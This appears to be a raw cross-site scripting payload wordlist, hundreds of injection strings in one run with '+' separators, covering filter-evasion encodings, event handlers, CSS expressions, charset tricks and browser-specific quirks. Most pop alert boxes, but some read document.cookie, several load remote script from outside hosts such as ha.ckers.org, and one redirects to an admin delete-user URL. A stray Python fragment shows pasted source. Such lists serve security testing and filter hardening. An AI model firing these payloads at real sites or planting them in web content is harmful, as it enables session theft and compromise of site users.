foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! 
foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= 
alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> 
+<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" 
to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> 
+<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html 
xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +<object onerror=javascript:javascript:alert(1)> +<embed type="image" src=%(scriptlet)s></embed> +<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> +<IMG SRC=&{javascript:alert(1);};> +<a href="jav&#65ascript:javascript:alert(1)">test1</a> +<a href="jav&#97ascript:javascript:alert(1)">test1</a> +<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> +<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>"> +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; +alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- +></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert("XSS")> +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> +<a onmouseover="alert(document.cookie)">xxs link</a> +<a onmouseover=alert(document.cookie)>xxs link</a> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG onmouseover="alert('xxs')"> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG 
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC="jav&#x0A;ascript:alert('XSS');"> +<IMG SRC="jav&#x0D;ascript:alert('XSS');"> +perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > +<SCRIPT SRC=//ha.ckers.org/.j> +<IMG SRC="javascript:alert('XSS')" +<iframe src=http://ha.ckers.org/scriptlet.html < +\";alert('XSS');// +</TITLE><SCRIPT>alert("XSS");</SCRIPT> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<BODY BACKGROUND="javascript:alert('XSS')"> +<IMG DYNSRC="javascript:alert('XSS')"> +<IMG LOWSRC="javascript:alert('XSS')"> +<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> +<IMG SRC='vbscript:msgbox("XSS")'> +<IMG SRC="livescript:[code]"> +<BODY ONLOAD=alert('XSS')> +<BGSOUND SRC="javascript:alert('XSS');"> +<BR SIZE="&{alert('XSS')}"> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> +<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> +<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> +<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> +<STYLE 
TYPE="text/javascript">alert('XSS');</STYLE> +<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<XSS STYLE="xss:expression(alert('XSS'))"> +<XSS STYLE="behavior: url(xss.htc);"> +¼script¾alert(¢XSS¢)¼/script¾ +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<BASE HREF="javascript:alert('XSS');//"> + <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> +<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> +<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT 
SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> +<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> +<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> +Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> + <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<A HREF="http://66.102.7.147/">XSS</A> +<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> +<A HREF="http://1113982867/">XSS</A> +<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> +<A HREF="http://0102.0146.0007.00000223/">XSS</A> +<A HREF="htt p://6 6.000146.0x7.147/">XSS</A> +<iframe src="&Tab;javascript:prompt(1)&Tab;"> +<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' +<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" +<sVg><scRipt >alert&lpar;1&rpar; {Opera} +<img/src=`` onerror=this.onerror=confirm(1) +<form><isindex formaction="javascript&colon;confirm(1)" +<img src=``&NewLine; onerror=alert(1)&NewLine; +<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> +<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? 
+<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> +<script /**/>/**/alert(1)/**/</script /**/ +&#34;&#62;<h1/onmouseover='\u0061lert(1)'> +<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> +<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> +<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script +<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} +<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> +<form><a href="javascript:\u0061lert&#x28;1&#x29;">X +</script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'> +<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> +<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> +<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a +http://www.google<script .com>alert(document.location)</script +<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a +<img/src=@&#32;&#13; onerror = prompt('&#49;') +<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; +<script ^__^>alert(String.fromCharCode(49))</script ^__^ +</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( +&#00;</form><input type&#61;"date" onfocus="alert(1)"> +<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> +<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ +<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> +<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> +<script ~~~>alert(0%0)</script ~~~> +<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> +<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN +<img/src='http://i.imgur.com/P8mL8.jpg' 
onmouseover=&Tab;prompt(1) +&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' +&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} +<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ +<div/style="width:expression(confirm(1))">X</div> {IE7} +<iframe// src=javaSCRIPT&colon;alert(1) +//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// +/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> +//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ +</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> +<a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> +</plaintext\></|\><plaintext/onmouseover=prompt(1) +</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<var onmouseover="prompt(1)">On Mouse Over</var> +<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> 
+<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> +<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> +<svg contentScriptType=text/vbs><script>MsgBox+1 +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script +<img src ?itworksonchrome?\/onerror = alert(1) +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> +<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> +<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> +<iframe 
src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> +'';!--"<XSS>=&{()} +'>//\\,<'>">">"*" +'); alert('XSS +<script>alert(1);</script> +<script>alert('XSS');</script> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<scr<script>ipt>alert('XSS');</scr</script>ipt> +<script>alert(String.fromCharCode(88,83,83))</script> +<img src=foo.png onerror=alert(/xssed/) /> +<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> +<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> +<marquee><script>alert('XSS')</script></marquee> +<IMG SRC=\"jav&#x09;ascript:alert('XSS');\"> +<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\"> +<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +"><script>alert(0)</script> +<script src=http://yoursite.com/your_files.js></script> +</title><script>alert(/xss/)</script> +</textarea><script>alert(/xss/)</script> +<IMG LOWSRC=\"javascript:alert('XSS')\"> +<IMG DYNSRC=\"javascript:alert('XSS')\"> +<font style='color:expression(alert(document.cookie))'> +<img src="javascript:alert('XSS')"> +<script language="JavaScript">alert('XSS')</script> +<body onunload="javascript:alert('XSS');"> +<body onLoad="alert('XSS');" +[color=red' onmouseover="alert('xss')"]mouse over[/color] +"/></a></><img src=1.gif onerror=alert(1)> +window.alert("Bonjour !"); +<div style="x:expression((window.r==1)?'':eval('r=1; +alert(String.fromCharCode(88,83,83));'))"> +<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe> 
+"><script alert(String.fromCharCode(88,83,83))</script> +'>><marquee><h1>XSS</h1></marquee> +'">><script>alert('XSS')</script> +'">><marquee><h1>XSS</h1></marquee> +<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> +<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"> +<script>var var = 1; alert(var)</script> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<?='<SCRIPT>alert("XSS")</SCRIPT>'?> +<IMG SRC='vbscript:msgbox(\"XSS\")'> +" onfocus=alert(document.domain) "> <" +<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET> +<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS +perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out +perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out +<br size=\"&{alert('XSS')}\"> +<scrscriptipt>alert(1)</scrscriptipt> +</br 